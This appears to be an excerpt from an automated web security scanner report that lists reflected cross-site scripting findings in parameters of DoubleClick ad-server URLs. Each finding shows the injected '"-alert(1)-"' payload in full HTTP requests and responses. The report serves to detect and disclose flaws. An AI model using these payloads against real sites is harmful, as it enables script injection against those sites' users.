User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956870d7"-alert(1)-"e17bcc3401c&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

...[SNIP]...

1.101. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a245"-alert(1)-"cb1a8ffbfb9 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=184995007a245"-alert(1)-"cb1a8ffbfb9&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
u%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=184995007a245"-alert(1)-"cb1a8ffbfb9&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWind
...[SNIP]...

1.102. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d25"-alert(1)-"54e88c0450 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=1168342d25"-alert(1)-"54e88c0450&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6777
Date: Tue, 28 Jun 2011 02:13:32 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
5129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=1168342d25"-alert(1)-"54e88c0450&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.103. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92266"-alert(1)-"754641c9b37 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=92266"-alert(1)-"754641c9b37 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6667
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:15:09 GMT
Expires: Tue, 28 Jun 2011 02:15:09 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=92266"-alert(1)-"754641c9b37http://learn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
v
...[SNIP]...

1.104. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6a7"-alert(1)-"38985baca84 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245bb6a7"-alert(1)-"38985baca84&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:11:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
515392/1%3Bu%3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245bb6a7"-alert(1)-"38985baca84&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...

1.105. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 247bf"-alert(1)-"bcccf64206b was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428247bf"-alert(1)-"bcccf64206b&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:07:00 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428247bf"-alert(1)-"bcccf64206b&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone");
var wmode = "opaque";
var bg
...[SNIP]...

1.106. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93190"-alert(1)-"bf63948427f was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=1793440593190"-alert(1)-"bf63948427f&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5739
Date: Tue, 28 Jun 2011 03:08:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=1793440593190"-alert(1)-"bf63948427f&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone");
var wmode = "opaque";
var bg = "same as S
...[SNIP]...

1.107. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2df8"-alert(1)-"1d6528d0a37 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341f2df8"-alert(1)-"1d6528d0a37&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
